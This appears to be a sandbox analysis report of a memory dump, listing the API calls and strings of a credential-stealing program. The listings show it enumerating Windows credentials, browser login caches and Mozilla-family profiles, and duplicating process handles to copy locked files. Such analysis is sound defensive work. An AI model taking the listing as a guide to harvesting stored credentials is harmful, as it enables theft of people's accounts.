                                                    • Part of subcall function 0040A8D0: ??3@YAXPAX@Z.MSVCRT ref: 0040A908
                                                    • Part of subcall function 0040A8D0: ??3@YAXPAX@Z.MSVCRT ref: 0040A92B
                                                    • Part of subcall function 0040A8D0: memcpy.MSVCRT ref: 0040A94F
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.216342952571.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: ??3@$_wcsicmpmemsetwcslen$_memicmp_snwprintfmemcpy
                                                  • String ID: $ContainerId$Container_%I64d$Containers$Name
                                                  • API String ID: 3883404497-2982631422
                                                  • Opcode ID: b10a6b133fecd4ba1fe00162e0f0d1ba32908353d1defd03a55daed51eef6c1a
                                                  • Instruction ID: de93d03617a61f3aa6bbe184beafcfad76b4f566d35596b706efacabd7485ccb
                                                  • Opcode Fuzzy Hash: b10a6b133fecd4ba1fe00162e0f0d1ba32908353d1defd03a55daed51eef6c1a
                                                  • Instruction Fuzzy Hash: 74318272D002196ADF10EFA6DC45ADEB7B8AF04344F1105BFE508B3191DB38AE598F99

                                                  APIs
                                                    • Part of subcall function 0040CC26: GetFileSize.KERNEL32(00000000,00000000,000003FF,?,00000000,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE,?), ref: 0040CC44
                                                    • Part of subcall function 0040CC26: FindCloseChangeNotification.KERNELBASE(?,?,000000FF,0000FDE9), ref: 0040CC98
                                                    • Part of subcall function 0040CCF0: _wcsicmp.MSVCRT ref: 0040CD2A
                                                  • memset.MSVCRT ref: 0040BC75
                                                  • memset.MSVCRT ref: 0040BC8C
                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,0044E518,000000FF,?,00000FFF,00000000,00000000,?,?,?,0040B7D4,?,?), ref: 0040BCA8
                                                  • memcmp.MSVCRT ref: 0040BCD6
                                                  • memcpy.MSVCRT ref: 0040BD2B
                                                  • LocalFree.KERNEL32(?,?,00000000,00000000,?,?,?,?,?,?,?,0040B7D4), ref: 0040BD3D
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.216342952571.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: memset$ByteChangeCharCloseFileFindFreeLocalMultiNotificationSizeWide_wcsicmpmemcmpmemcpy
                                                  • String ID:
                                                  • API String ID: 509814883-3916222277
                                                  • Opcode ID: 2c6b40c8534ef55c53201c5afea9c0c191c5eda6ef18d79290db5ec64fa84378
                                                  • Instruction ID: 00a8249a540342db609c93f8c1f67c79963b4134db5221072d0e6ece1bb2d715
                                                  • Opcode Fuzzy Hash: 2c6b40c8534ef55c53201c5afea9c0c191c5eda6ef18d79290db5ec64fa84378
                                                  • Instruction Fuzzy Hash: 3F41B372900219ABDB10ABA5CC85ADEB7ACEF04314F01057BB509F7292D7789E45CA99

                                                  APIs
                                                  • CreateFileW.KERNELBASE(?,-7FBE829D,00000003,00000000,?,?,00000000), ref: 00418457
                                                  • CreateFileA.KERNEL32(?,-7FBE829D,00000003,00000000,|A,00417CE3,00000000), ref: 0041846F
                                                  • GetLastError.KERNEL32 ref: 0041847E
                                                  • ??3@YAXPAX@Z.MSVCRT ref: 0041848B
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.216342952571.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: CreateFile$??3@ErrorLast
                                                  • String ID: |A
                                                  • API String ID: 1407640353-1717621600
                                                  • Opcode ID: b73738cfafb11dafaf653c45b8d30767a4f0487cb759c2014a2d8a4f30590433
                                                  • Instruction ID: 73005d91fce95ddd83c4435d1527c7398ec28b7193468e33704956b81d718a95
                                                  • Opcode Fuzzy Hash: b73738cfafb11dafaf653c45b8d30767a4f0487cb759c2014a2d8a4f30590433
                                                  • Instruction Fuzzy Hash: 50412472508306AFD710CF25DC4179BBBE5FF84328F14492EF8A492290EB78D9448B96

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.216342952571.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: ??2@$HandleIconLoadModulememsetwcscpy
                                                  • String ID: r!A
                                                  • API String ID: 2791114272-628097481
                                                  • Opcode ID: c8dffcb2de6473715ddac6d72e3c76979a49d8854762dd44dbb162fd21f04a95
                                                  • Instruction ID: f2e108ad35b37ee9f58e8ef6409d1766b43f0b07df47584fb449e80907097569
                                                  • Opcode Fuzzy Hash: c8dffcb2de6473715ddac6d72e3c76979a49d8854762dd44dbb162fd21f04a95
                                                  • Instruction Fuzzy Hash: 0431A1B19013889FEB30EF669C896CAB7E8FF44314F00852FE90CCB241DBB946548B49

                                                  APIs
                                                    • Part of subcall function 0040B1AB: ??3@YAXPAX@Z.MSVCRT ref: 0040B1AE
                                                    • Part of subcall function 0040B1AB: ??3@YAXPAX@Z.MSVCRT ref: 0040B1B6
                                                    • Part of subcall function 0040AA04: ??3@YAXPAX@Z.MSVCRT ref: 0040AA0B
                                                    • Part of subcall function 0040C274: memset.MSVCRT ref: 0040C298
                                                    • Part of subcall function 0040C274: FindFirstUrlCacheEntryW.WININET(visited:,?,80000001), ref: 0040C30D
                                                    • Part of subcall function 0040C274: wcschr.MSVCRT ref: 0040C324
                                                    • Part of subcall function 0040C274: wcschr.MSVCRT ref: 0040C344
                                                    • Part of subcall function 0040C274: FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C369
                                                    • Part of subcall function 0040C274: GetLastError.KERNEL32 ref: 0040C373
                                                    • Part of subcall function 0040C3C3: memset.MSVCRT ref: 0040C439
                                                    • Part of subcall function 0040C3C3: RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,?,?,00000000,?), ref: 0040C467
                                                    • Part of subcall function 0040C3C3: _wcsupr.MSVCRT ref: 0040C481
                                                    • Part of subcall function 0040C3C3: memset.MSVCRT ref: 0040C4D0
                                                    • Part of subcall function 0040C3C3: RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,000000FF,?,?,?,?,00000000), ref: 0040C4FB
                                                  • _wcslwr.MSVCRT ref: 0040C817
                                                    • Part of subcall function 0040C634: wcslen.MSVCRT ref: 0040C65F
                                                    • Part of subcall function 0040C634: memset.MSVCRT ref: 0040C6BF
                                                  • wcslen.MSVCRT ref: 0040C82C
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.216342952571.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: memset$??3@$CacheEntryEnumFindValuewcschrwcslen$ErrorFirstLastNext_wcslwr_wcsupr
                                                  • String ID: /$/$http://www.facebook.com/$https://login.yahoo.com/config/login$https://www.google.com/accounts/servicelogin
                                                  • API String ID: 62308376-4196376884
                                                  • Opcode ID: 2e55d37c3c93c49036042ab263f5962c07f69a8f438a79de627d7f97dd271f33
                                                  • Instruction ID: 5b72bd72183a146cc5fb8da473a5bce975bbff0c760a192580a28ed18ba85502
                                                  • Opcode Fuzzy Hash: 2e55d37c3c93c49036042ab263f5962c07f69a8f438a79de627d7f97dd271f33
                                                  • Instruction Fuzzy Hash: 42218272A00244A6CF10BB6A9C8589E7B68EF44744B10457BB804B7293D67CDE85DB9D
                                                  APIs
                                                    • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 00404398
                                                    • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043AC
                                                    • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043BF
                                                    • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043D3
                                                    • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043E7
                                                  • CredEnumerateW.ADVAPI32(00000000,00000000,?,?,?,00000000,?), ref: 0040BDE9
                                                  • wcslen.MSVCRT ref: 0040BE06
                                                  • _wcsncoll.MSVCRT ref: 0040BE38
                                                  • memset.MSVCRT ref: 0040BE91
                                                  • memcpy.MSVCRT ref: 0040BEB2
                                                  • _wcsnicmp.MSVCRT ref: 0040BEFC
                                                  • wcschr.MSVCRT ref: 0040BF24
                                                  • LocalFree.KERNEL32(?,?,?,?,00000001,?,?,?,00000000,?), ref: 0040BF48
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.216342952571.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: AddressProc$CredEnumerateFreeLocal_wcsncoll_wcsnicmpmemcpymemsetwcschrwcslen
                                                  • String ID:
                                                  • API String ID: 3191383707-0
                                                  • Opcode ID: 4320d3521706fdf8c6ed48fb05be967b0956d3d4dbd01890db6896aba47bd834
                                                  • Instruction ID: 79a9ca8399314c5bcb3e205da5602351372edcdcc58f79068602210d8f55f42f
                                                  • Opcode Fuzzy Hash: 4320d3521706fdf8c6ed48fb05be967b0956d3d4dbd01890db6896aba47bd834
                                                  • Instruction Fuzzy Hash: 1851E9B5D002099FCF20DFA5C8859AEBBF9FF48304F10452AE919F7251E734A9458F69
                                                  APIs
                                                  • memset.MSVCRT ref: 00403CBF
                                                  • memset.MSVCRT ref: 00403CD4
                                                  • memset.MSVCRT ref: 00403CE9
                                                  • memset.MSVCRT ref: 00403CFE
                                                  • memset.MSVCRT ref: 00403D13
                                                    • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                    • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                                    • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                    • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                    • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                    • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                    • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                    • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
                                                    • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
                                                    • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
                                                    • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
                                                    • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
                                                    • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
                                                    • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
                                                  • memset.MSVCRT ref: 00403DDA
                                                    • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                    • Part of subcall function 004099C6: memcpy.MSVCRT ref: 004099E3
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.216342952571.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: memset$wcscpy$wcslen$Close_snwprintfmemcpywcscat
                                                  • String ID: Waterfox$Waterfox\Profiles
                                                  • API String ID: 3527940856-11920434
                                                  • Opcode ID: fa7a89f4834ef8b5b40aee994800d4865c67d250ea9d7d7a0362dcd02f226988
                                                  • Instruction ID: d72014143a293005b417e5222852f61d3cfc405123c5957a7e6d01a12b636873
                                                  • Opcode Fuzzy Hash: fa7a89f4834ef8b5b40aee994800d4865c67d250ea9d7d7a0362dcd02f226988
                                                  • Instruction Fuzzy Hash: 1E4133B294012C7ADB20EB56DC85ECF777CEF85314F1180ABB509B2181DA745B948FAA
                                                  APIs
                                                  • memset.MSVCRT ref: 00403E50
                                                  • memset.MSVCRT ref: 00403E65
                                                  • memset.MSVCRT ref: 00403E7A
                                                  • memset.MSVCRT ref: 00403E8F
                                                  • memset.MSVCRT ref: 00403EA4
                                                    • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                    • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                                    • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                    • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                    • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                    • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                    • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                    • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
                                                    • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
                                                    • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
                                                    • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
                                                    • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
                                                    • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
                                                    • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
                                                  • memset.MSVCRT ref: 00403F6B
                                                    • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                    • Part of subcall function 004099C6: memcpy.MSVCRT ref: 004099E3
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.216342952571.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: memset$wcscpy$wcslen$Close_snwprintfmemcpywcscat
                                                  • String ID: Mozilla\SeaMonkey$Mozilla\SeaMonkey\Profiles
                                                  • API String ID: 3527940856-2068335096
                                                  • Opcode ID: 4e0f951fde323d6a6ece029bc301e1d43e2d4c472937678d86f27e99a49f71a6
                                                  • Instruction ID: badb9319ce56d3a3e0b5d4601891faab39f88fc9b3936f94b46873e2979bc7df
                                                  • Opcode Fuzzy Hash: 4e0f951fde323d6a6ece029bc301e1d43e2d4c472937678d86f27e99a49f71a6
                                                  • Instruction Fuzzy Hash: F94133B294012CBADB20EB56DC85FCF777CAF85314F1180A7B509F2181DA785B848F6A
                                                  APIs
                                                  • memset.MSVCRT ref: 00403FE1
                                                  • memset.MSVCRT ref: 00403FF6
                                                  • memset.MSVCRT ref: 0040400B
                                                  • memset.MSVCRT ref: 00404020
                                                  • memset.MSVCRT ref: 00404035
                                                    • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                    • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                                    • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                    • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                    • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                    • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                    • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                    • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
                                                    • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
                                                    • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
                                                    • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
                                                    • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
                                                    • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
                                                    • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
                                                  • memset.MSVCRT ref: 004040FC
                                                    • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                    • Part of subcall function 004099C6: memcpy.MSVCRT ref: 004099E3
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.216342952571.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: memset$wcscpy$wcslen$Close_snwprintfmemcpywcscat
                                                  • String ID: Mozilla\Firefox$Mozilla\Firefox\Profiles
                                                  APIs
                                                  Strings
                                                  Similarity
                                                  • API ID: memcpy
                                                  • String ID: BINARY$NOCASE$RTRIM$main$no such vfs: %s$temp
                                                  APIs
                                                    • Part of subcall function 0040B633: ??3@YAXPAX@Z.MSVCRT ref: 0040B63A
                                                    • Part of subcall function 0044553B: memset.MSVCRT ref: 004455C2
                                                    • Part of subcall function 0044553B: wcsrchr.MSVCRT ref: 004455DA
                                                  • memset.MSVCRT ref: 004033B7
                                                  • memcpy.MSVCRT ref: 004033D0
                                                  • wcscmp.MSVCRT ref: 004033FC
                                                  • _wcsicmp.MSVCRT ref: 00403439
                                                  Strings
                                                  Similarity
                                                  • API ID: memset$??3@_wcsicmpmemcpywcscmpwcsrchr
                                                  • String ID: $0.@
                                                  APIs
                                                    • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                    • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                    • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                    • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                    • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                    • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                  • GetProcAddress.KERNEL32(00000000,00000000), ref: 004449E7
                                                  • GetProcAddress.KERNEL32(00000000,00000000), ref: 004449F8
                                                  • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A09
                                                  • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A1A
                                                  • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A2B
                                                  • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A3C
                                                  • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A4D
                                                  Similarity
                                                  • API ID: AddressProc$LibraryLoad$DirectorySystemmemsetwcscatwcscpy
                                                  • String ID:
                                                  APIs
                                                  • memset.MSVCRT ref: 00403C09
                                                  • memset.MSVCRT ref: 00403C1E
                                                    • Part of subcall function 00409719: wcslen.MSVCRT ref: 0040971A
                                                    • Part of subcall function 00409719: wcscat.MSVCRT ref: 00409732
                                                  • wcscat.MSVCRT ref: 00403C47
                                                    • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                    • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                                    • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                  • wcscat.MSVCRT ref: 00403C70
                                                  Strings
                                                  Similarity
                                                  • API ID: memsetwcscat$Closewcscpywcslen
                                                  • String ID: Mozilla\Firefox\Profiles$Mozilla\Profiles
                                                  APIs
                                                  • memset.MSVCRT ref: 0040A824
                                                  • GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                  • wcscpy.MSVCRT ref: 0040A854
                                                  • wcscat.MSVCRT ref: 0040A86A
                                                  • LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                  • LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                  Similarity
                                                  • API ID: LibraryLoad$DirectorySystemmemsetwcscatwcscpy
                                                  • String ID:
                                                  APIs
                                                  • wcschr.MSVCRT ref: 00414458
                                                  • _snwprintf.MSVCRT ref: 0041447D
                                                  • WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 0041449B
                                                  • GetPrivateProfileStringW.KERNEL32(?,?,?,?,?,?), ref: 004144B3
                                                  Strings
                                                  Similarity
                                                  • API ID: PrivateProfileString$Write_snwprintfwcschr
                                                  • String ID: "%s"
                                                  APIs
                                                  • GetModuleHandleW.KERNEL32(kernel32.dll,?,00413EA2,?,?,?,?,?,00000000,?), ref: 00413CB5
                                                  • GetProcAddress.KERNEL32(00000000,GetProcessTimes), ref: 00413CCF
                                                  • GetProcessTimes.KERNELBASE(00000000,?,?,?,?,?,00413EA2,?,?,?,?,?,00000000,?), ref: 00413CF2
                                                  Strings
                                                  Similarity
                                                  • API ID: AddressHandleModuleProcProcessTimes
                                                  • String ID: GetProcessTimes$kernel32.dll
                                                  APIs
                                                  • memset.MSVCRT ref: 004087D6
                                                    • Part of subcall function 0040A6E6: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,000003FF,000000FF,00000000,000003FF,00000000,00000000,0040B866,00445FAE,?,?,?,?,?,?), ref: 0040A6FF
                                                    • Part of subcall function 004095D9: memset.MSVCRT ref: 004095FC
                                                  • memset.MSVCRT ref: 00408828
                                                  • memset.MSVCRT ref: 00408840
                                                  • memset.MSVCRT ref: 00408858
                                                  • memset.MSVCRT ref: 00408870
                                                  • memset.MSVCRT ref: 00408888
                                                    • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                    • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                    • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                    • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                    • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                  Similarity
                                                  • API ID: memset$wcslen$AttributesByteCharFileMultiWidewcscatwcscpy
                                                  • String ID:
                                                  APIs
                                                  Strings
                                                  Similarity
                                                  • API ID: memcmp
                                                  • String ID: @ $SQLite format 3
                                                  APIs
                                                    • Part of subcall function 00414B81: GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathW), ref: 00414BA4
                                                  • memset.MSVCRT ref: 00414C87
                                                  • RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                                  • wcscpy.MSVCRT ref: 00414CFC
                                                    • Part of subcall function 00409CEA: GetVersionExW.KERNEL32(0045D340,0000001A,00414C4F,?,00000000), ref: 00409D04
                                                  Strings
                                                  • Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders, xrefs: 00414CA2, 00414CB2
                                                  Similarity
                                                  • API ID: AddressCloseProcVersionmemsetwcscpy
                                                  • String ID: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
                                                  APIs
                                                  Strings
                                                  Similarity
                                                  • API ID: _wcsicmpqsort
                                                  • String ID: /nosort$/sort
                                                  APIs
                                                  • memset.MSVCRT ref: 0040E60F
                                                  • memset.MSVCRT ref: 0040E629
                                                    • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                    • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                    • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                    • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                    • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                  Strings
                                                  • Microsoft\Windows\WebCache\WebCacheV01.dat, xrefs: 0040E647
                                                  • Microsoft\Windows\WebCache\WebCacheV24.dat, xrefs: 0040E66F
                                                  Similarity
                                                  • API ID: memsetwcslen$AttributesFilewcscatwcscpy
                                                  • String ID: Microsoft\Windows\WebCache\WebCacheV01.dat$Microsoft\Windows\WebCache\WebCacheV24.dat
                                                  APIs
                                                  • FindResourceW.KERNELBASE(?,?,?), ref: 004148C3
                                                  • SizeofResource.KERNEL32(?,00000000), ref: 004148D4
                                                  • LoadResource.KERNEL32(?,00000000), ref: 004148E4
                                                  • LockResource.KERNEL32(00000000), ref: 004148EF
                                                  Similarity
                                                  • API ID: Resource$FindLoadLockSizeof
                                                  • String ID:
                                                  APIs
                                                  Strings
                                                  • only a single result allowed for a SELECT that is part of an expression, xrefs: 0043AAD3
                                                  Similarity
                                                  • API ID: memset
                                                  • String ID: only a single result allowed for a SELECT that is part of an expression
                                                  APIs
                                                  • Sleep.KERNEL32(00000064), ref: 004175D0
                                                  • FindCloseChangeNotification.KERNELBASE(?,00000000,?,0045DBC0,00417C24,?,00000000,00000000,?,00417DE1,?,00000000), ref: 004175D9
                                                  Strings
                                                  Similarity
                                                  • API ID: ChangeCloseFindNotificationSleep
                                                  • String ID: }A
                                                  APIs
                                                  Strings
                                                  Similarity
                                                  • API ID: ??3@DeleteObject
                                                  • String ID: r!A
                                                  APIs
                                                  Similarity
                                                  • API ID: ??2@
                                                  • String ID:
                                                  • API String ID: 1033339047-0
                                                  APIs
                                                    • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 004449E7
                                                    • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 004449F8
                                                    • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A09
                                                    • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A1A
                                                    • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A2B
                                                    • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A3C
                                                    • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A4D
                                                  • memcmp.MSVCRT ref: 00444BA5
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.216342952571.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: AddressProc$memcmp
                                                  • String ID: $$8
                                                  • API String ID: 2808797137-435121686
                                                  APIs
                                                    • Part of subcall function 0040E01E: OpenProcess.KERNEL32(00000040,00000000,00000000,00000104,?,00000000,00000104,?,00000000,00000104,00000000), ref: 0040E093
                                                    • Part of subcall function 0040E01E: GetCurrentProcess.KERNEL32(?,80000000,00000000,00000000), ref: 0040E0B2
                                                    • Part of subcall function 0040E01E: DuplicateHandle.KERNELBASE(?,00000104,00000000), ref: 0040E0BF
                                                    • Part of subcall function 0040E01E: GetFileSize.KERNEL32(?,00000000), ref: 0040E0D4
                                                    • Part of subcall function 0040E01E: CreateFileMappingW.KERNELBASE(?,00000000,00000002,00000000,00000000,00000000), ref: 0040E0FE
                                                    • Part of subcall function 0040E01E: MapViewOfFile.KERNELBASE(00000000,00000004,00000000,00000000,00000104), ref: 0040E113
                                                    • Part of subcall function 0040E01E: WriteFile.KERNELBASE(00000000,00000000,00000104,0040E6A3,00000000), ref: 0040E12E
                                                    • Part of subcall function 0040E01E: UnmapViewOfFile.KERNEL32(00000000), ref: 0040E135
                                                    • Part of subcall function 0040E01E: FindCloseChangeNotification.KERNELBASE(?), ref: 0040E13E
                                                  • FindCloseChangeNotification.KERNELBASE(000000FF,000000FF,00000000,?,0040E6A3,000000FF,?,00000104,00000000), ref: 0040E582
                                                    • Part of subcall function 0040E2AB: memset.MSVCRT ref: 0040E380
                                                    • Part of subcall function 0040E2AB: wcschr.MSVCRT ref: 0040E3B8
                                                    • Part of subcall function 0040E2AB: memcpy.MSVCRT ref: 0040E3EC
                                                  • DeleteFileW.KERNELBASE(?,?,0040E6A3,000000FF,?,00000104,00000000), ref: 0040E5A3
                                                  • CloseHandle.KERNEL32(000000FF,?,0040E6A3,000000FF,?,00000104,00000000), ref: 0040E5CA
                                                    • Part of subcall function 0040E175: memset.MSVCRT ref: 0040E1BD
                                                    • Part of subcall function 0040E175: _snwprintf.MSVCRT ref: 0040E257
                                                    • Part of subcall function 0040E175: ??3@YAXPAX@Z.MSVCRT ref: 0040E28B
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.216342952571.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: File$Close$ChangeFindHandleNotificationProcessViewmemset$??3@CreateCurrentDeleteDuplicateMappingOpenSizeUnmapWrite_snwprintfmemcpywcschr
                                                  • String ID:
                                                  • API String ID: 1042154641-0
                                                  APIs
                                                    • Part of subcall function 00418680: GetFullPathNameW.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 004186AC
                                                    • Part of subcall function 00418680: malloc.MSVCRT ref: 004186B7
                                                    • Part of subcall function 00418680: ??3@YAXPAX@Z.MSVCRT ref: 004186C7
                                                    • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
                                                  • GetDiskFreeSpaceW.KERNELBASE(00000000,?,00000200,?,?,?,00000000,?,00000000), ref: 004187D2
